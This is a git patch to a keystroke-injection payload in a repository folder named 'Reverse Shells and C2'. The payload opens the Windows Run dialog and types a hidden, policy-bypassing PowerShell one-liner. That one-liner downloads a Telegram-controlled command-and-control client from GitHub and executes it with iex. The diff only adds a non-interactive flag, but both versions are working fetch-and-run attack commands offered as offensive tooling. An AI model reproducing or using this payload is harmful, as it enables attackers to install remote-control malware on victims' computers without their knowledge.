From 5d6d9484a99ef5ddc8138e3df682508a752332f6 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Thu, 30 Nov 2023 17:41:52 +0000 Subject: [PATCH] Update Telegram-C2-Client.txt --- Reverse Shells and C2/Telegram-C2-Client.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Reverse Shells and C2/Telegram-C2-Client.txt b/Reverse Shells and C2/Telegram-C2-Client.txt index c7d882d..086a9f6 100644 --- a/Reverse Shells and C2/Telegram-C2-Client.txt +++ b/Reverse Shells and C2/Telegram-C2-Client.txt @@ -22,7 +22,7 @@ REM open powershell DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE';irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex +STRING powershell -NonI -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE';irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex ENTER